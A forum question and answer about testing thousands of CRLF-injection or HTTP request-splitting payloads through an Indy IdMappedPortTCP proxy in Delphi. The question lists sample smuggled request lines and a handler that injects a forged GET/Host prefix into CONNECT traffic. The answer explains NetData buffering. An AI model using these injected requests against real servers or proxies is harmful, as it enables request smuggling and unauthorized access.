Testing Somesite CRLF Bugs Hole Using Indy IdMappedPortTCP

Question

I want to create a small tool like CRLF Injection or HTTP header respons splitting. I was successful created thousands NetData pattern (data payload) lists. The NetData pattern like this example:

1. GET http://somebug.com/ HTTP/1.1[CRLF]Host : somehost.com[CRLF]GET somesite.com HTTP/1.1[CRLF][CRLF]

2. GET http://somebug.com/ HTTP/1.1[CRLF]Host : somehost.com[CRLF][CRLF]GET somesitesite.com HTTP/1.1[CRLF][CRLF]

3. HEAD http://somebug.com/ HTTP/1.1[CRLF]Host : somehost.com[CRLF]CONNECT somesitesite.com HTTP/1.0[CRLF][CRLF][CRLF][CRLF]

   ...

If just one data pattern/data payload, I can write example code like:

procedure T_CRLFTest.IdMappedPortTCP1Execute(AContext: TIdContext);
begin
  if(Pos('CONNECT',TIdMappedPortContext(AContext).NetData)<>0) then
    TIdMappedPortContext(AContext).NetData := 'GET http://somebug.com/ HTTP/1.1'#13#10'Host : somehost.com'#13#10+TIdMappedPortContext(AContext).NetData+#13#10#13#10
end;

The problem is, how to test all data pattern let say over 20,000 lists using IdMappedPortTCP with multi threaded technique?

I'm using Delphi 2007 and Indy 10.

Answer 1

NetData contains whatever raw data was available on the socket at the moment the OnExecute event was fired. There is no guarantee of the content of NetData on any given triggering of the event. So every time the event is triggered, you need to store that data to your own per-connection buffer somewhere, then you can parse that buffer looking for complete lines and tweaking them as needed, then update the NetData with new data as needed. Whatever data is in NetData when the event handler exits is the data that gets passed along to the target server.

BTW, HEAD http://somebug.com/ HTTP/1.1[CRLF]Host : somehost.com[CRLF]CONNECT somesitesite.com HTTP/1.0[CRLF][CRLF][CRLF][CRLF] is two HTTP commands overlapping each other. That should never happen in a real scenario. If it is, then the client that is sending those commands is faulty.